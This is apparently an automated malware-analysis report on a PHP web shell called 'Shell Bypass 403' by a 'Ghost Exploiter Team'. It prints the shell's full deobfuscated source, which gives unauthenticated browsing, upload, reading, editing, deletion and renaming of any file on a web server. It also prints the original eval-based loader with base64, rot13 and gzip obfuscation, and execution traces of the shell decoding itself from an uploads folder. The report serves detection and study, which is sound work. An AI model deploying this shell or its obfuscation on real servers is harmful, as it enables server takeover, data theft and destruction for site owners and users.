4033.PHp

md5: 5426e684d550af16ff977d1c41781bfe

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Original, Traces)

Environment
getcwd (Deobfuscated, Traces)

Execution
eval (Original, Traces)

Files
file_get_contents (Deobfuscated, Traces)
move_uploaded_file (Deobfuscated)

Input
_FILES (Deobfuscated, Traces)
_GET (Deobfuscated, Traces)
_POST (Deobfuscated, Traces)

Title
Shell Bypass 403 GE-C666C (Deobfuscated, HTML)

URLs
http://ghostexploiter.ga/tools/obfusfactor (Deobfuscated, Original)
https://fonts.googleapis.com/css2?family=Courgette& (HTML)
https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor
$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";
$ghost = "=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";
eval /* PHPDeobfuscator eval output */ {
    ?><!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->

<?php 
    ?><?php; ?>
<!DOCTYPE html>
<html>
<head>
	<title>Shell Bypass 403 GE-C666C</title>
	<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> 
</head>
<style>
	* {
		font-family: cursive;
		color: #000;
		font-family: 'Cuprum', sans-serif;
	}

	body {
		background-repeat: no-repeat;
		background-attachment:fixed;
		background-size: 100% 1700px;
	}
	body h1{
		color: #A52A2A;
		text-shadow: 2px 2px 2px #000;
		font-size: 50px;
	}
	.dir {
		text-align: center;
		font-size: 30px;
	}
	.dir a{
		text-decoration: none;
		color: #48D1CC;
		text-shadow: 1px 1px 1px #000;

	}
	.dir a:hover{
		text-decoration: none;
		color: red;
	}
	table {
		margin: 12px auto;
		height: 100%;
		border-collapse: collapse;
		font-size: 30px;
	}
	table,th {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: 3px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 2px 2px;
		color: #F0E68C;
		text-shadow: 1px 1px 1px #000;
	}
	table,td {
		border-top:1px solid #000;
		border-right:3px solid #000;
		border-bottom: .5px solid #000;
		border-left:1px solid #000;
		box-sizing: border-box;
		padding: 8px 8px;
		color: red;
	}
	table,td a {
		text-decoration: none;
		color:#8A2BE2;
		text-shadow: 1px 1px 1px #000;
	}
	table,td a:hover {
		text-decoration: none;
		color: red;
	}
	.button1 {
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: #000;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1 a{
		width: 70px;
		height: 30px;
		background-color: #999;
		margin: 10px 3px;
		padding: 5px;
		color: red;
		border-radius: 5px;
		border: 1px solid #000;
		box-shadow: .5px .5px .3px .3px #fff;
		box-sizing: border-box;
	}
	.button1:hover {
		text-shadow: 0px 0px 5px #fff;
		box-shadow: .5px .5px .3px .3px #555;
		text-decoration: none;
	}
	textarea {
		border: 1px solid green;
		border-radius: 5px;
		box-shadow: 1px 1px 1px 1px #fff;
		width: 100%;
		height: 400px;
		padding-left: 10px;
		margin: 10px auto;
		resize: none;
		background: green;
		color: #ffffff;
		font-family: 'Cuprum', sans-serif;
		font-size: 13px;
	}
</style>
<body>
	<center><h1>Ghost Exploiter Team Official</h1></center>
  <div class="dir">
	<?php 
    if (isset($_GET['dir'])) {
        $dir = $_GET['dir'];
    } else {
        $dir = getcwd();
    }
    $dir = str_replace("\\", "/", $dir);
    $dirs = explode("/", $dir);
    foreach ($dirs as $key => $value) {
        if ($value == "" && $key == 0) {
            echo "<a href=\"/\">/</a>";
            continue;
        }
        echo "<a href=\"?dir=";
        for ($i = 0; $i <= $key; $i++) {
            echo "{$dirs[$i]}";
            if ($key !== $i) {
                echo "/";
            }
        }
        echo '">' . $value . '</a>/';
    }
    if (isset($_POST['submit'])) {
        $namafile = $_FILES['upload']['name'];
        $tempatfile = $_FILES['upload']['tmp_name'];
        $tempat = $_GET['dir'];
        $error = $_FILES['upload']['error'];
        $ukuranfile = $_FILES['upload']['size'];
        move_uploaded_file($tempatfile, $dir . '/' . $namafile);
        echo "\r\n\t\t\t\t\t<script>alert('diupload!!!');</script>\r\n\t\t\t\t\t";
    }
    ?>

	<form method="post" enctype="multipart/form-data">
		<input type="file" name="upload">
		<input type="submit" name="submit" value="Upload">
		
	</form>

  </div>
<table>
	<tr>
		<th>Nama File / Folder</th>
		<th>Size</th>
		<th>Action</th>
	</tr>
	<?php 
    $scan = scandir($dir);
    foreach ($scan as $directory) {
        if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
            continue;
        }
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '/' . $directory . '">' . $directory . '</a></td>
	<td>--</td>
	<td>NONE</td>
	</tr>
	';
    }
    foreach ($scan as $file) {
        if (!is_file($dir . '/' . $file)) {
            continue;
        }
        $jumlah = filesize($dir . '/' . $file) / 1024;
        $jumlah = round($jumlah, 3);
        if ($jumlah >= 1024) {
            $jumlah = round($jumlah / 1024, 2) . 'MB';
        } else {
            $jumlah .= 'KB';
        }
        echo '
	<tr>
	<td><a href="?dir=' . $dir . '&open=' . $dir . '/' . $file . '">' . $file . '</a></td>
	<td>' . $jumlah . '</td>
	<td>
	<a href="?dir=' . $dir . '&delete=' . $dir . '/' . $file . '" class="button1">Hapus</a>
	<a href="?dir=' . $dir . '&ubah=' . $dir . '/' . $file . '" class="button1">Edit</a>
	<a href="?dir=' . $dir . '&rename=' . $dir . '/' . $file . '&nama=' . $file . '" class="button1">Rename</a>
	</td>
	</tr>
	';
    }
    if (isset($_GET['open'])) {
        echo '
	<br />
	<style>
		table {
			display: none;
		}
	</style>
	<textarea>' . htmlspecialchars(file_get_contents($_GET['open'])) . '</textarea>
	';
    }
    if (isset($_GET['delete'])) {
        if (unlink($_GET['delete'])) {
            echo "<script>alert('dihapus');window.location='?dir=" . $dir . "';</script>";
        }
    }
    if (isset($_GET['ubah'])) {
        echo '

		<style>
			table {
				display: none;
			}
		</style>

		<a href="?dir=' . $dir . '" class="button1"><=Back</a>
		<form method="post" action="">
		<input type="hidden" name="object" value="' . $_GET['ubah'] . '">
		<textarea name="edit">' . htmlspecialchars(file_get_contents($_GET['ubah'])) . '</textarea>
		<center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center>
		</form>

		';
    }
    if (isset($_POST['edit'])) {
        $data = fopen($_POST["object"], 'w');
        if (fwrite($data, $_POST['edit'])) {
            echo '
			<script>alert("Berhasil diedit!!!");window.location="?dir=' . $dir . '";</script>						
			';
        } else {
            echo "\r\n\t\t\t<script>alert('gagal');</script>\t\t\t\t\t\r\n\t\t\t";
        }
    }
    if ($_GET['rename']) {
        if (isset($_POST['newname'])) {
            if (rename($_GET['rename'], $_GET['dir'] . '/' . $_POST['newname'])) {
                echo "<font color=\"green\">Ganti Nama Berhasil</font><br/>";
                echo "<script>window.location='?dir=" . $dir . "';</script>";
            } else {
                echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
            }
        }
        echo '<br><center><form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_GET['nama'] . '" />
<input type="hidden" name="path" value="' . $_GET['dir'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form></center>';
    }
    ?>
</table>
</body>
</html><?php 
};
exit;
Execution traces
data/traces/5426e684d550af16ff977d1c41781bfe_trace-1676260235.409.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:51:01.306808]
1	0	1	0.000175	393512
1	3	0	0.000242	397312	{main}	1		/var/www/html/uploads/4033.PHp	0	0
1		A						/var/www/html/uploads/4033.PHp	5	$code = 'a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy'
1		A						/var/www/html/uploads/4033.PHp	5	$ghost = '=cDIeyzFwH8/X0Y4N+drltgSMDXX/DFHl3aWmdFSQR6yabBtR8GAoHoqSPk18kgu6oC5bfYYwOQ6f0e1jpiiHhxy3yYHnJ4WCyClw6kosuWhK0lXoSqpG9DIb3i7rBgOvQ5bEvpwAhFcZ19rwhOxKUZpR7SLNo/LBo+DTGt70fAr+SR29VxZ3ODhhGSjfqK6cNmmUnU4FWS+si83CIHDFouIFyHeWOmYewIk9JwIkE6Y+lvNCiGI3su1B00sYwnt1Q3wCcfdcw0tj6vWfWBRvqKNXVkYqXrG2ubnatfap3nZsWZRl3GZtzKVYr0RBICPmBZiMuOUM3d9tBeVvIzuHo0GCU0AmzOBu11jlht3Ev/jsOOFaY8YHE7y4sPUl1UoW17Eque25V/eK+NU91xdTD2bIz/ltBgK8WRKqE+x6suatXLfOaNXvJyirLHyxMlXNiJN6JJWJqLzAKtc/S3BxTmmMhNsQkXCkesV79oqii45CRiWuFcnrL4JsZ8ZTV9R'
2	4	0	0.000303	397312	base64_decode	0		/var/www/html/uploads/4033.PHp	7	1	'a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy'
2	4	1	0.000322	397472
2	4	R			'k�X-X��C��F�X�*�X��-(W-.�U���X�V,VRo%%\026���ħ�&秤w\024�\024\025��v��t�\027�u��5\000VY\0332'
2	5	0	0.000346	397440	str_rot13	0		/var/www/html/uploads/4033.PHp	7	1	'k�X-X��C��F�X�*�X��-(W-.�U���X�V,VRo%%\026���ħ�&秤w\024�\024\025��v��t�\027�u��5\000VY\0332'
2	5	1	0.000368	397584
2	5	R			'x�K-K��P��S�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i��g�\027�h��5\000IL\0332'
2	6	0	0.000390	397424	gzuncompress	0		/var/www/html/uploads/4033.PHp	7	1	'x�K-K��P��S�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i��g�\027�h��5\000IL\0332'
2	6	1	0.000415	397568
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($ghost))))));'
2	7	0	0.000444	399176	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($ghost))))));'	/var/www/html/uploads/4033.PHp	7	0
3	8	0	0.000478	399176	strrev	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	1	'=cDIeyzFwH8/X0Y4N+drltgSMDXX/DFHl3aWmdFSQR6yabBtR8GAoHoqSPk18kgu6oC5bfYYwOQ6f0e1jpiiHhxy3yYHnJ4WCyClw6kosuWhK0lXoSqpG9DIb3i7rBgOvQ5bEvpwAhFcZ19rwhOxKUZpR7SLNo/LBo+DTGt70fAr+SR29VxZ3ODhhGSjfqK6cNmmUnU4FWS+si83CIHDFouIFyHeWOmYewIk9JwIkE6Y+lvNCiGI3su1B00sYwnt1Q3wCcfdcw0tj6vWfWBRvqKNXVkYqXrG2ubnatfap3nZsWZRl3GZtzKVYr0RBICPmBZiMuOUM3d9tBeVvIzuHo0GCU0AmzOBu11jlht3Ev/jsOOFaY8YHE7y4sPUl1UoW17Eque25V/eK+NU91xdTD2bIz/ltBgK8WRKqE+x6suatXLfOaNXvJyirLHyxMlXNiJN6JJWJqLzAKtc/S3BxTmmMhNsQkXCkesV79oqii45CRiWuFcnrL4JsZ8ZTV9R'
3	8	1	0.000518	402280
3	8	R			'ATcIyPcBMgjN93icxRlrU9vG9rMzk/+wKL7ItNiyIaTElkyBEtq5bdIp6YdOmmHW0traIkua1SqGm/Lfe86uVi8LLrkzvWXGlrTn/T4y7s5wSL6nN+Scp5KSyzDJJLm4TaOESybIe0bXz5+9D2l8k5HTKCI/sfUCzhVeiYZYZDicP3/2/Jl7kobpjJzAg7vz3bvz97/9fEFCuY7woLwyGsC150ouIza/ChmwPrtLaZaRl+NDcnkxPH/16tW562gERI14fENCwZaeFUqZZlPHWSaxzEarJFlFjKY8G/nJ2vGz7OBkSdc8uvPOk1ysmJRs1xzkqcjXUy5p9O3EHP6SbALOst2AZ2lE77xsQ1OLCBZ5VibvIpaFjElrTkBxp9DcVQDU6yvyGb57qMpQ85sSPxcZ/8RmCPCTKBFT8mI8Hs+2EG2tj71PMhpnw4wJvkSse/Rkb5EEd5r7gvo3K5HkcTAULGVUTkmcFLezFgKVkvrhmsVyuuS3LGjDM/4fNiWT'
3	9	0	0.000561	402248	base64_decode	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	1	'ATcIyPcBMgjN93icxRlrU9vG9rMzk/+wKL7ItNiyIaTElkyBEtq5bdIp6YdOmmHW0traIkua1SqGm/Lfe86uVi8LLrkzvWXGlrTn/T4y7s5wSL6nN+Scp5KSyzDJJLm4TaOESybIe0bXz5+9D2l8k5HTKCI/sfUCzhVeiYZYZDicP3/2/Jl7kobpjJzAg7vz3bvz97/9fEFCuY7woLwyGsC150ouIza/ChmwPrtLaZaRl+NDcnkxPH/16tW562gERI14fENCwZaeFUqZZlPHWSaxzEarJFlFjKY8G/nJ2vGz7OBkSdc8uvPOk1ysmJRs1xzkqcjXUy5p9O3EHP6SbALOst2AZ2lE77xsQ1OLCBZ5VibvIpaFjElrTkBxp9DcVQDU6yvyGb57qMpQ85sSPxcZ/8RmCPCTKBFT8mI8Hs+2EG2tj71PMhpnw4wJvkSse/Rkb5EEd5r7gvo3K5HkcTAULGVUTkmcFLezFgKVkvrhmsVyuuS3LGjDM/4fNiWT'
3	9	1	0.000609	405352
3	9	R			'\0017\b�\0012\b�x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p���'
3	10	0	0.000718	402248	gzinflate	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	1	'\0017\b�\0012\b�x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p���'
3	10	1	0.000830	404840
3	10	R			'\0012\b�x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p����b!٭\0'
3	11	0	0.000936	401736	gzinflate	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	1	'\0012\b�x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p����b!٭\0'
3	11	1	0.001039	404328
3	11	R			'x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p����b!٭\034f!\r�͔'
3	12	0	0.001195	401736	gzuncompress	0		/var/www/html/uploads/4033.PHp(7) : eval()'d code	1	1	'x��\031kS���3���(�ȴز!�ĖL�\022ڹm�)�N�a����"K��*����{ήV/\v.�3�eƖ��>2��pH��7䜧���0�$��M��K&�{F�ϟ�\017i|���("?��\002�\025^��Xd8�?���{��錜����ݻ�|AB���2\032���J.#6�\n\031�>�Ki����Cry1<��չ�h\004D�x|CB���\025J�fS�Y&��F�$YE��<\033������dI�<��Γ\\���l�\034���S.i���\034��l\002β݀giD�lCS�\b\026yV&�"���IkN@q���U\000��+�\031�{��P�\022?\027\031��f\b�(\021S�b<\036϶\020m���O2\032gÌ\t�D�{�do�\004w����7+��q0\024,eTNI�\024��\026\002�����r��,h�3�\0376%��_d��x��\026\002��p����b!٭\034f!\r�͔'
3	12	1	0.001344	409960
3	12	R			'<!-- Hak Cipta Ghost Exploiter Team\r\nThanks All Member GhostExploiterTeam -->\r\n\r\n<?php; ?>\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<title>Shell Bypass 403 GE-C666C</title>\r\n\t<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> \r\n</head>\r\n<style>\r\n\t* {\r\n\t\tfont-family: cursive;\r\n\t\tcolor: #000;\r\n\t\tfont-family: \'Cuprum\', sans-serif;\r\n\t}\r\n\r\n\tbody {\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tba'
3	13	0	0.001586	432856	eval	1	'?><!-- Hak Cipta Ghost Exploiter Team\r\nThanks All Member GhostExploiterTeam -->\r\n\r\n<?php; ?>\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n\t<title>Shell Bypass 403 GE-C666C</title>\r\n\t<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> \r\n</head>\r\n<style>\r\n\t* {\r\n\t\tfont-family: cursive;\r\n\t\tcolor: #000;\r\n\t\tfont-family: \'Cuprum\', sans-serif;\r\n\t}\r\n\r\n\tbody {\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-attachment:fixed;\r\n\t\tbackground-size: 100% 1700px;\r\n\t}\r\n\tbody h1{\r\n\t\tcolor: #A52A2A;\r\n\t\ttext-shadow: 2px 2px 2px #000;\r\n\t\tfont-size: 50px;\r\n\t}\r\n\t.dir {\r\n\t\ttext-align: center;\r\n\t\tfont-size: 30px;\r\n\t}\r\n\t.dir a{\r\n\t\ttext-decoration: none;\r\n\t\tcolor: #48D1CC;\r\n\t\ttext-shadow: 1px 1px 1px #000;\r\n\r\n\t}\r\n\t.dir a:hover{\r\n\t\ttext-decoration: none;\r\n\t\tcolor: red;\r\n\t}\r\n\ttable {\r\n\t\tmargin: 12px auto;\r\n\t\theight: 100%;\r\n\t\tborder-collapse: collapse;\r\n\t\tfont-size: 30px;\r\n\t}\r\n\ttable,th {\r\n\t\tborder-top:1px solid #000;\r\n\t\tborder-right:3px solid #000;\r\n\t\tborder-bottom: 3px solid #000;\r\n\t\tborder-left:1px solid #000;\r\n\t\tbox-sizing: border-box;\r\n\t\tpadding: 2px 2px;\r\n\t\tcolor: #F0E68C;\r\n\t\ttext-shadow: 1px 1px 1px #000;\r\n\t}\r\n\ttable,td {\r\n\t\tborder-top:1px solid #000;\r\n\t\tborder-right:3px solid #000;\r\n\t\tborder-bottom: .5px solid #000;\r\n\t\tborder-left:1px solid #000;\r\n\t\tbox-sizing: border-box;\r\n\t\tpadding: 8px 8px;\r\n\t\tcolor: red;\r\n\t}\r\n\ttable,td a {\r\n\t\ttext-decoration: none;\r\n\t\tcolor:#8A2BE2;\r\n\t\ttext-shadow: 1px 1px 1px #000;\r\n\t}\r\n\ttable,td a:hover {\r\n\t\ttext-decoration: none;\r\n\t\tcolor: red;\r\n\t}\r\n\t.button1 {\r\n\t\twidth: 70px;\r\n\t\theight: 30px;\r\n\t\tbackground-color: #999;\r\n\t\tmargin: 10px 3px;\r\n\t\tpadding: 5px;\r\n\t\tcolor: #000;\r\n\t\tborder-radius: 5px;\r\n\t\tborder: 1px solid #000;\r\n\t\tbox-shadow: .5px .5px .3px .3px #fff;\r\n\t\tbox-sizing: border-box;\r\n\t}\r\n\t.button1 a{\r\n\t\twidth: 70px;\r\n\t\theight: 30px;\r\n\t\tbackground-color: #999;\r\n\t\tmargin: 10px 3px;\r\n\t\tpadding: 5px;\r\n\t\tcolor: red;\r\n\t\tborder-radius: 5px;\r\n\t\tborder: 1px solid #000;\r\n\t\tbox-shadow: .5px .5px .3px .3px #fff;\r\n\t\tbox-sizing: border-box;\r\n\t}\r\n\t.button1:hover {\r\n\t\ttext-shadow: 0px 0px 5px #fff;\r\n\t\tbox-shadow: .5px .5px .3px .3px #555;\r\n\t\ttext-decoration: none;\r\n\t}\r\n\ttextarea {\r\n\t\tborder: 1px solid green;\r\n\t\tborder-radius: 5px;\r\n\t\tbox-shadow: 1px 1px 1px 1px #fff;\r\n\t\twidth: 100%;\r\n\t\theight: 400px;\r\n\t\tpadding-left: 10px;\r\n\t\tmargin: 10px auto;\r\n\t\tresize: none;\r\n\t\tbackground: green;\r\n\t\tcolor: #ffffff;\r\n\t\tfont-family: \'Cuprum\', sans-serif;\r\n\t\tfont-size: 13px;\r\n\t}\r\n</style>\r\n<body>\r\n\t<center><h1>Ghost Exploiter Team Official</h1></center>\r\n  <div class="dir">\r\n\t<?php  \r\n\tif (isset($_GET[\'dir\'])) {\r\n\t\t\t$dir = $_GET[\'dir\'];\r\n\t\t} else {\r\n\t\t\t$dir = getcwd();\r\n\t\t}\r\n\r\n\t\t$dir = str_replace("\\\\", "/", $dir);\r\n\t\t$dirs = explode("/", $dir);\r\n\r\n\t\tforeach ($dirs as $key => $value) {\r\n\t\t\tif ($value == "" && $key == 0){\r\n\t\t\t\techo \'<a href="/">/</a>\'; continue;\r\n\t\t\t} echo \'<a href="?dir=\';\r\n\r\n\t\t\tfor ($i=0; $i <= $key ; $i++) { \r\n\t\t\t\techo "$dirs[$i]"; if ($key !== $i) echo "/";\r\n\t\t\t} echo \'">\'.$value.\'</a>/\';\r\n\t}\r\n\tif (isset($_POST[\'submit\'])){\r\n\r\n\t\t$namafile = $_FILES[\'upload\'][\'name\'];\r\n\t\t$tempatfile = $_FILES[\'upload\'][\'tmp_name\'];\r\n\t\t$tempat = $_GET[\'dir\'];\r\n\t\t$error = $_FILES[\'upload\'][\'error\'];\r\n\t\t$ukuranfile = $_FILES[\'upload\'][\'size\'];\r\n\r\n\t\tmove_uploaded_file($tempatfile, $dir.\'/\'.$namafile);\r\n\t\t\t\techo 